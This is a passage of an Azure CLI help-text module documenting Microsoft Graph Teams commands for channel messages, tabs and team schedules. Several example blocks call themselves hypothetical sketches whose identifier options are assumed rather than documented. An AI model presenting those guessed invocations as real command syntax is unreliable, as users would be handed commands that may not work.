long-summary: |
Usage: --special-folder name=XX
            name: The unique identifier for this item in the /drive/special collection.
- name: --microsoft-graph-video
short-summary: "video"
long-summary: |
Usage: --microsoft-graph-video audio-bits-per-sample=XX audio-channels=XX audio-format=XX \
audio-samples-per-second=XX bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --view
short-summary: "folderView"
long-summary: |
Usage: --view sort-by=XX sort-order=XX view-type=XX
sort-by: The method by which the folder should be sorted.
sort-order: If true, indicates that items should be sorted in descending order. Otherwise, items should be \
sorted ascending.
view-type: The type of view that should be used to represent the folder.
- name: --hashes
short-summary: "hashes"
long-summary: |
Usage: --hashes crc32-hash=XX quick-xor-hash=XX sha1-hash=XX sha256-hash=XX
crc32-hash: The CRC32 value of the file in little endian (if available). Read-only.
quick-xor-hash: A proprietary hash of the file that can be used to determine if the contents of the file \
have changed (if available). Read-only.
sha1-hash: SHA1 hash for the contents of the file (if available). Read-only.
sha256-hash: SHA256 hash for the contents of the file (if available). Read-only.
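    examples:
      # Hypothetical sketch only: the --team-id identifier argument is assumed from the command path; --file-system-info
      # follows the key=value usage documented above, and the timestamps shown are placeholder values.
      - name: Update file system timestamps on the primary channel filesFolder (illustrative; identifier argument name is an assumption)
        text: |-
               az teams team-primary-channel update-file-folder --team-id "{team-id}" --file-system-info \
created-date-time="2017-07-29T02:11:36Z" last-modified-date-time="2017-07-29T02:11:36Z"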
"""
helps['teams team-primary-channel update-member'] = """
type: command
short-summary: "Update the navigation property members in teams."
"""
helps['teams team-primary-channel update-message'] = """
type: command
short-summary: "Update the navigation property messages in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
            content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of the \
image specified, for example image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format. video/: Video type with the format specified, for example video/mp4. Populate the contentUrl \
field with the base64 encoding of the file in data: format. audio/: Audio type with the format specified, for example \
audio/wmw. Populate the contentUrl field with the base64 encoding of the file in data: format. application/card type: Rich \
card attachment type with the card type specifying the exact card format to use. Set content with the JSON format of the \
card. Supported values for card type include: application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images, buttons, and input fields. Set the content property to an AdaptiveCard object. \
application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an AnimationCard \
object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content property to an AudioCard \
object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content property to a VideoCard \
object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a HeroCard object. \
application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a ThumbnailCard object. \
application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a ReceiptCard object. \
application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-primary-channel update-tab'] = """
type: command
short-summary: "Update the navigation property tabs in teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
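    examples:
      - name: Sketch of updating a tab on the primary channel. The --team-id and --teams-tab-id options and their values are assumed placeholders; only --configuration keys documented above are set.
        text: |-
               az teams team-primary-channel update-tab --team-id "{team-id}" --teams-tab-id "{teamsTab-id}" --configuration content-url="https://www.contoso.com/tabs/orders" entity-id="order-tab-001" website-url="https://www.contoso.com/orders"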
"""
helps['teams team-primary-channel-message'] = """
type: group
short-summary: Manage team primary channel message with teams_v1_0
"""
helps['teams team-primary-channel-message create-hosted-content'] = """
type: command
short-summary: "Create new navigation property to hostedContents for teams."
"""
helps['teams team-primary-channel-message create-reply'] = """
type: command
short-summary: "Create new navigation property to replies for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of \
the image specified, for example image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 \
encoding of the file in data: format. video/: Video type with the format specified, for example video/mp4. Populate the \
contentUrl field with the base64 encoding of the file in data: format. audio/: Audio type with the format specified, \
for example audio/wmw. Populate the contentUrl field with the base64 encoding of the file in data: format. \
application/card type: Rich card attachment type with the card type specifying the exact card format to use. Set \
content with the JSON format of the card. Supported values for card type include: \
application/vnd.microsoft.card.adaptive: A rich card that can contain any combination of text, speech, images, \
buttons, and input fields. Set the content property to an AdaptiveCard object. \
application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an \
AnimationCard object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property to an AudioCard object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property to a VideoCard object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object. application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object. application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object. application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
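    examples:
      - name: Sketch of replying to a primary channel message. The --team-id and --chat-message-id options and their values are assumed placeholders; --body uses the content and content-type keys documented above.
        text: |-
               az teams team-primary-channel-message create-reply --team-id "{team-id}" --chat-message-id "{chatMessage-id}" --body content="Thanks for the update!" content-type="text"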
"""
helps['teams team-primary-channel-message delete-hosted-content'] = """
type: command
short-summary: "Delete navigation property hostedContents for teams."
"""
helps['teams team-primary-channel-message delete-reply'] = """
type: command
short-summary: "Delete navigation property replies for teams."
"""
helps['teams team-primary-channel-message list-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-primary-channel-message list-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-primary-channel-message show-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-primary-channel-message show-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-primary-channel-message update-hosted-content'] = """
type: command
short-summary: "Update the navigation property hostedContents in teams."
"""
helps['teams team-primary-channel-message update-reply'] = """
type: command
short-summary: "Update the navigation property replies in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of \
the image specified, for example image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 \
encoding of the file in data: format. video/: Video type with the format specified, for example video/mp4. Populate the \
contentUrl field with the base64 encoding of the file in data: format. audio/: Audio type with the format specified, \
for example audio/wmw. Populate the contentUrl field with the base64 encoding of the file in data: format. \
application/card type: Rich card attachment type with the card type specifying the exact card format to use. Set \
content with the JSON format of the card. Supported values for card type include: \
application/vnd.microsoft.card.adaptive: A rich card that can contain any combination of text, speech, images, \
buttons, and input fields. Set the content property to an AdaptiveCard object. \
application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an \
AnimationCard object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property to an AudioCard object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property to a VideoCard object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object. application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object. application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object. application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
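    examples:
      - name: Sketch of updating an existing reply. The ID options (--team-id, --chat-message-id, --chat-message-id1) and their values are assumed placeholders; --body uses the keys documented above.
        text: |-
               az teams team-primary-channel-message update-reply --team-id "{team-id}" --chat-message-id "{chatMessage-id}" --chat-message-id1 "{reply-id}" --body content="Edited reply text" content-type="text"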
"""
helps['teams team-primary-channel-tab'] = """
type: group
short-summary: Manage team primary channel tab with teams_v1_0
"""
helps['teams team-primary-channel-tab delete-ref-team-app'] = """
type: command
short-summary: "Delete ref of navigation property teamsApp for teams."
"""
helps['teams team-primary-channel-tab set-ref-team-app'] = """
type: command
short-summary: "Update the ref of navigation property teamsApp in teams."
"""
helps['teams team-primary-channel-tab show-ref-team-app'] = """
type: command
short-summary: "Get ref of teamsApp from teams."
"""
helps['teams team-primary-channel-tab show-team-app'] = """
type: command
short-summary: "Get teamsApp from teams."
"""
helps['teams team-schedule'] = """
type: group
short-summary: Manage team schedule with teams_v1_0
"""
helps['teams team-schedule create-offer-shift-request'] = """
type: command
short-summary: "Create new navigation property to offerShiftRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
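    examples:
      - name: Sketch of creating an offer shift request. Only the identity keys documented above are set; --team-id and any request-specific options the command may require are assumed placeholders.
        text: |-
               az teams team-schedule create-offer-shift-request --team-id "{team-id}" --user display-name="Jane Doe" id="{user-id}"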
"""
helps['teams team-schedule create-open-shift'] = """
type: command
short-summary: "Create new navigation property to openShifts for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --draft-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
- name: --shared-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --shared-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
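    examples:
      - name: Sketch of creating an open shift. The --team-id option and its value are assumed placeholders; the --shared-open-shift keys follow the Usage line above.
        text: |-
               az teams team-schedule create-open-shift --team-id "{team-id}" --shared-open-shift open-slot-count=4 display-name="Evening shift" notes="Front desk coverage" start-date-time="2014-01-01T16:00:00Z" end-date-time="2014-01-02T00:00:00Z" theme="blue"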
"""
helps['teams team-schedule create-open-shift-change-request'] = """
type: command
short-summary: "Create new navigation property to openShiftChangeRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-scheduling-group'] = """
type: command
short-summary: "Create new navigation property to schedulingGroups for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-shift'] = """
type: command
short-summary: "Create new navigation property to shifts for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --activities code=XX display-name=XX end-date-time=XX is-paid=XX start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --activities argument.
- name: --microsoft-graph-shift-item-activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --microsoft-graph-shift-item-activities code=XX display-name=XX end-date-time=XX is-paid=XX \
start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --microsoft-graph-shift-item-activities argument.
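    examples:
      - name: Sketch of creating a shift with a single activity. The --team-id option and its value are assumed placeholders; the --activities keys follow the Usage line above.
        text: |-
               az teams team-schedule create-shift --team-id "{team-id}" --activities code="LUNCH" display-name="Lunch break" start-date-time="2014-01-01T12:00:00Z" end-date-time="2014-01-01T12:30:00Z" is-paid=false theme="white"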
"""
helps['teams team-schedule create-swap-shift-change-request'] = """
type: command
short-summary: "Create new navigation property to swapShiftsChangeRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-time-off'] = """
type: command
short-summary: "Create new navigation property to timesOff for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --draft-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
- name: --shared-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --shared-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
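    examples:
      - name: Sketch of creating a time-off entry. The --team-id option and the timeOffReason ID are assumed placeholders; the --shared-time-off keys follow the Usage line above.
        text: |-
               az teams team-schedule create-time-off --team-id "{team-id}" --shared-time-off time-off-reason-id="{timeOffReason-id}" start-date-time="2014-01-01T00:00:00Z" end-date-time="2014-01-02T00:00:00Z" theme="pink"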
"""
helps['teams team-schedule create-time-off-reason'] = """
type: command
short-summary: "Create new navigation property to timeOffReasons for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-time-off-request'] = """
type: command
short-summary: "Create new navigation property to timeOffRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule delete-offer-shift-request'] = """
type: command
short-summary: "Delete navigation property offerShiftRequests for teams."
"""
helps['teams team-schedule delete-open-shift'] = """
type: command
short-summary: "Delete navigation property openShifts for teams."
"""
helps['teams team-schedule delete-open-shift-change-request'] = """
type: command
short-summary: "Delete navigation property openShiftChangeRequests for teams."
"""
helps['teams team-schedule delete-scheduling-group'] = """
type: command
short-summary: "Delete navigation property schedulingGroups for teams."
"""
helps['teams team-schedule delete-shift'] = """
type: command
short-summary: "Delete navigation property shifts for teams."
"""
helps['teams team-schedule delete-swap-shift-change-request'] = """
type: command
short-summary: "Delete navigation property swapShiftsChangeRequests for teams."
"""
helps['teams team-schedule delete-time-off'] = """
type: command
short-summary: "Delete navigation property timesOff for teams."
"""
helps['teams team-schedule delete-time-off-reason'] = """
type: command
short-summary: "Delete navigation property timeOffReasons for teams."
"""
helps['teams team-schedule delete-time-off-request'] = """
type: command
short-summary: "Delete navigation property timeOffRequests for teams."
"""
helps['teams team-schedule list-offer-shift-request'] = """
type: command
short-summary: "Get offerShiftRequests from teams."
"""
helps['teams team-schedule list-open-shift'] = """
type: command
short-summary: "Get openShifts from teams."
"""
helps['teams team-schedule list-open-shift-change-request'] = """
type: command
short-summary: "Get openShiftChangeRequests from teams."
"""
helps['teams team-schedule list-scheduling-group'] = """
type: command
short-summary: "Get schedulingGroups from teams."
"""
helps['teams team-schedule list-shift'] = """
type: command
short-summary: "Get shifts from teams."
"""
helps['teams team-schedule list-swap-shift-change-request'] = """
type: command
short-summary: "Get swapShiftsChangeRequests from teams."
"""
helps['teams team-schedule list-time-off'] = """
type: command
short-summary: "Get timesOff from teams."
"""
helps['teams team-schedule list-time-off-reason'] = """
type: command
short-summary: "Get timeOffReasons from teams."
"""
helps['teams team-schedule list-time-off-request'] = """
type: command
short-summary: "Get timeOffRequests from teams."
"""
helps['teams team-schedule share'] = """
type: command
short-summary: "Invoke action share."
"""
helps['teams team-schedule show-offer-shift-request'] = """
type: command
short-summary: "Get offerShiftRequests from teams."
"""
helps['teams team-schedule show-open-shift'] = """
type: command
short-summary: "Get openShifts from teams."
"""
helps['teams team-schedule show-open-shift-change-request'] = """
type: command
short-summary: "Get openShiftChangeRequests from teams."
"""
helps['teams team-schedule show-scheduling-group'] = """
type: command
short-summary: "Get schedulingGroups from teams."
"""
helps['teams team-schedule show-shift'] = """
type: command
